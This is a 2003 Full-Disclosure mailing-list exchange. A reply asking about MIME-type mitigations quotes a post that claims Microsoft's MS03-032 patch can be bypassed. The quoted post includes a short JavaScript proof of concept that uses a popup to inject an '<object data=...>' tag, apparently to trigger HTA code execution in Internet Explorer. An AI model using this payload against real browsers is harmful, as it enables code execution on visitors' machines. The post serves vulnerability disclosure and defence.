Can this bug also be fixed by changing the MIME type of HTA files from "application/hta" to something else? If so, what other MIME types need to be switched to avoid the <OBJECT DATA=>? Any thoughts why .HTA files have a MIME type in the first place?
Richard

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of [EMAIL PROTECTED]
Sent: Sunday, September 07, 2003 9:17 AM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] BAD NEWS: Microsoft Security Bulletin MS03-032

Since the cat somehow got out of the bag, and more importantly, this is so blatantly obvious, herewith is the "Bad News":

The patch for Drew's object data=funky.hta doesn't work:

http://www.malware.com/badnews.html

<script>
var oPopup = window.createPopup();
function showPopup() {
  oPopup.document.body.innerHTML = "<object data=ouch.php>";
  oPopup.show(0,0,1,1,document.body);
}
showPopup()
</script>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
